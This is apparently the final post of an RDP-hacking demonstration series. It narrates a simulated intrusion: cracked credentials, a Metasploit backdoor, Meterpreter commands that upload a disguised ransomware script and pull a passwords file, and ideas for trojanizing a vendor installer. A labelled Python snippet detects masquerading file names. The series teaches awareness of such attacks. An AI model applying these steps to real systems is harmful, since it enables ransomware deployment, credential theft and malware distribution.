I hope you have enjoyed this short series on RDP hacking. The aim was to show how quickly things can snowball when just one user becomes compromised on a shared resource like an RDP server. Anyway, back to this last video in the series.
If you haven’t watched the previous videos and you are not sure how we got to this point, I’d recommend watching them so you are up to speed.
As a recap, we compromised the guest user on an RDP server, dumped all available credentials from memory, and then cracked the hashes to see what other credentials we could get.
We managed to crack 3 of the hashes giving us the logins for the following accounts:
We logged in with thirdparty.adm because, in general, these accounts are poorly maintained and not regularly used. They are also used by lots of different support engineers, so changes or suspicious activity are unlikely to be noticed, whereas the company's own admins are usually more diligent.
We want to copy over some malicious files but find that clipboard/copy and paste is disabled for this account, meaning we need to find another way to get our files onto the target machine.
We start another listener in Metasploit, then manually browse back to the evil website we used to compromise the guest account, as we know this works and was not spotted previously.
We download and run the malware which gives us a backdoor into the machine.
We then use Meterpreter to upload our ransomware file, which we will use to encrypt the entire server, and also to download any files of interest. We take the passwords file (although in reality we would take a copy of EVERYTHING), as vendors will often reuse credentials, so we save these in case we come across this third party again, or perhaps use them to start a targeted attack against the third party vendor. We could also take the installer, inject it with malware, then upload it to a “freeware” site offering it with licence keys for download to help us infect more machines. Everything can be used in some way to help us in our malicious activities.
Meterpreter commands used in this video are:
- `upload RansomwareFile.Docx.bat c:\\users\\thirdparty.adm\\Documents\\RansomwareFile.docx.bat` Here we use the “upload” command, followed by our ransomware malware file, then state the location on the victim we wish to upload the file to. Note the double backslash.
- `download c:\\users\\thirdparty.adm\\Documents\\passwords.rft` Here we simply use the “download” command and state the file and location. Note the double backslash.
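The uploaded file's name, a document extension followed by a script extension, is something a defender can hunt for in file-creation logs or directory listings. The following is an added example, not part of the original post; the extension lists, function names and sample paths are constructed assumptions.

```python
from pathlib import PureWindowsPath

# Assumed lists for this example; tune them to your environment.
DECOY_EXTS = {"doc", "docx", "rtf", "pdf", "xls", "xlsx", "txt", "jpg", "png"}
SCRIPT_EXTS = {"bat", "cmd", "exe", "com", "scr", "pif", "js", "vbs", "ps1", "hta"}


def masquerade_info(path):
    """Return (decoy_ext, real_ext) if the file name hides a script or
    executable behind a document-style extension, otherwise None."""
    # Windows ignores trailing dots and spaces in a name, so strip them first.
    name = PureWindowsPath(path).name.rstrip(" .").lower()
    parts = name.split(".")
    if len(parts) < 3:  # need at least base + decoy + real extension
        return None
    # Padding such as "photo.jpg      .scr" pushes the real extension off
    # screen in a narrow column, so strip whitespace around each piece.
    decoy, real = parts[-2].strip(), parts[-1].strip()
    if decoy in DECOY_EXTS and real in SCRIPT_EXTS:
        return decoy, real
    return None


def find_masquerading(paths):
    """Return (path, decoy_ext, real_ext) for every suspicious path."""
    hits = []
    for p in paths:
        info = masquerade_info(p)
        if info:
            hits.append((p, info[0], info[1]))
    return hits


# Constructed sample listing: the first two paths come from the commands
# above, the rest are invented for illustration.
SAMPLE_PATHS = [
    r"c:\users\thirdparty.adm\Documents\RansomwareFile.docx.bat",
    r"c:\users\thirdparty.adm\Documents\passwords.rft",
    r"C:\Users\guest\Downloads\Invoice.PDF.exe",
    r"C:\Users\guest\Downloads\photo.jpg      .scr",
    r"C:\Users\server.adm\Desktop\backup.tar.gz",
    r"C:\Users\backup.adm\Documents\notes.v2.docx",
]

if __name__ == "__main__":
    for path, decoy, real in find_masquerading(SAMPLE_PATHS):
        print(f"{path}: looks like .{decoy}, runs as .{real}")
```

Dots in directory names such as `thirdparty.adm` do not trigger a match, because only the final path component is inspected.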
Once we have stolen all we want, we just need to run our malware. We want to ensure that it runs with the highest permissions so it has access to as much data across the machine as possible. This is where we will use the server.adm or backup.adm accounts if we need them.
We right-click to run our malicious file as administrator and bingo, we do not even need our other accounts. The third party account is running with local admin, so our ransomware completes without issue. Success!
Hope you enjoy the video, and this series. We will pick a new topic and do another short series.